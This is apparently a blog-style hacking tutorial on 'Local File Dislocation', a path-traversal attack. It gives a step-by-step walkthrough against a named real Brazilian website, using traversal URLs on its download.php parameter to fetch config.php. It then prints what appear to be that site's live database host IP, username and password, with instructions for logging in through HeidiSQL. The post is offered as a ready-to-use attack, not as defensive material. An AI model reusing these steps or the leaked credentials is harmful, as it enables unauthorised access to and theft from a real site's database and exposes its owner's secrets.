LFD(Local File Dislocation)

Hack Using LFD, Hack Config Entry, How To Hack Config Data, Website Hacking Using LFD
What Is LFD:-

In Local File Dislocation, Attacker Can Abe To Download Config.php (DataBase) File, And Theft The Db Pass, user Name, Database, Host_name And Connect To The Database Using Some Soft (Hedi Sql), And Than Attacker Login To PhpMyAdmin.



In Local File Dislocation Url Shown The Web Server Directory(that Is vulnerable Section) 
Ex:-


www.site.com/download.php?arquivo=/home/mturbina2/public_html/sistema/apresentacao.pdf



Ok Lets Start I Have A Website Try To Download Config File:-



Target:-www.mturbina.com.br/site/download.php?arquivo=/home/mturbina2/public_html/sistema/produtos/kaindl/000000011/pdf/apresentacao.pdf



Step:-1 Copy And Paste The Target Url On The WebBrowser Url Bar, And Hit Enter.

Step:-2 If  We Can Hit The Enter One File Can Be Download, This File Is Useless, We Only Need To Download The Index.php And Config.php



Step:-3 Remove The All Url Section After (download.php?arquivo=) Or Remove The Url After (=/home/mturbina2/public_html/) Follow Any One Condition I Follow First Condition.

Ex:- (Url Now Look Like This) www.mturbina.com.br/site/download.php?arquivo=



Step:-4 Put the (../index.php) After The ?arquivo= Its Use For Directory Jumping Or Send To Back On One Directory on Server. Some Time We Use(../../../../../../../index.php) More Than One Time For Correct Location.

(But In this Site We Not Need To Jumping To Another Location, So We Not Need To Put (,,/))

Ex:- Now Url Like This:- http://www.mturbina.com.br/site/download.php?arquivo=index.php

You Can See The Index.php File Start To Downloading (Download It)



Step:-5 Open The Download File(index.php) Open It In Notepad 

Using This (index.php) We Find Out The Config.php(data Base Connection) File Location 

We Find out The Successfully Location Of Config File ("../sistema/config.php")



Step:-6 Now Donload The (../sistema/config.php) File.  And Connect To DataBase.

Ex:- http://www.mturbina.com.br/site/download.php?arquivo=../sistema/config.php



Step:-7 Open The HeidiSQL Download Here(http://www.heidisql.com/download.php) And Put Data Base Entry In this.

Config Entry For HediSql:- Located In Config File
Db_Hostname=179.188.16.14
DbUser=mturbina2
DbPass=turbina72


Video Tutorial:-
Share on Google Plus

About Anonymous

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment